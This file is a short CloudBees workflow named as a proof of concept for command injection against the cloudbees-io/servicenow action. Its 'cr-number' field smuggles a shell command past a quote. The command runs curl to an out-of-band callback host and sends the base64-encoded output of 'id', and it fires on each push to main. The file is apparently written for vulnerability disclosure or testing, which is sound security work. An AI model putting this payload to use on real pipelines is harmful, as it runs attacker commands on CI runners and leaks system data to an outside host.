apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: servicenow-injection-poc
on:
  push:
    branches: [ main ]
  workflow_dispatch:
jobs:
  exploit:
    steps:
      - uses: cloudbees-io/servicenow@v1
        with:
          action-type: 'create_change'
          url: 'https://example.service-now.com'
          username: 'testuser'
          password: 'testpass'
          cr-number: "12345'; curl https://d91eqdkjor36hfjvqohghe8uy8rqk6yg1.oast.live/?id=$(id | base64 -w0); echo 'DONE'; :'"
